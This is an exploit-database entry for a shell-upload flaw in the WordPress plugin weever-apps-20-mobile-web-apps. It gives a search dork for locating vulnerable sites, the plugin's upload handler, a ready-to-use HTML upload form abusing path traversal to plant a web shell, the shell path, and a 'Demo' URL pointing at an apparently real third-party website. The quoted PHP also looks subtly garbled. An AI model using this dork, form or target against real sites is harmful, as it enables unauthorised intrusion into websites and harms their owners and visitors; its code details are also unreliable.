Wordpress weever-apps-20-mobile-web-apps Shell Upload Exploit

2015-12-15T00:00:00
ID 1337DAY-ID-24735
Type zdt
Reporter sniper.t
Modified 2015-12-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################################################################
# Exploit Title: Wordpress weever-apps-20-mobile-web-apps Shell Upload Exploit
# Software Link: http://weeverapps.com/product/cms/
#Version:all Version
# Google dork1: inurl:/wp-content/plugins/weever-apps-20-mobile-web-apps
######################################################################
 
 The code in ./wp-content/weever-apps-20-mobile-web-apps/file-upload.php
<?php

// TODO - Consider changing the filename to be guaranteed unique.
// NOTE - This currently only (properly) supports uploading a single file.
//        If multiple files are uploaded, the name of the last file will be returned.

$uploads_dir_path = $_GET['upload_path'];	// This is where we *save* the file, eg, /home/www/wp-content/uploads/2013/12/pretty-flowers.jpg
$uploads_dir_url  = $_GET['upload_url'];	// This is where we *read* the file, eg, http://example.com/wp-content/uploads/2013/12/pretty-flowers.jpg
$file_name        = '';						// This is what we return to the user.

foreach ($_FILES as $key => $error) {
	$file = $_FILES[ $key ];
	$error = $file['error'];
    if ($error == UPLOAD_ERR_OK) {
        $tmp_name = $file["tmp_name"];
        $name = $file["name"];
        $file_name = "$uploads_dir_url/$name";
        move_uploaded_file($tmp_name, "$uploads_dir_path/$wp-content/uploads/2013/12");
    }
}

header('Content-type: application/json');
echo json_encode( array(
	"file_name" => $file_name
) );
die();
========================================================================================
Exploit Code:
 <form action="http://localhost/wordpress/wp-content/plugins/weever-apps-20-mobile-web-apps/file-upload.php?upload_path=../../../" method="POST" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" value="Upload">
</form>
 
 
 
 

 Shell path  http://localhost/wordpress/name.shell



Demo


http://jrpoilservice.com/wp-content/plugins/weever-apps-20-mobile-web-apps/file-upload.php


#  0day.today [2018-04-08]  #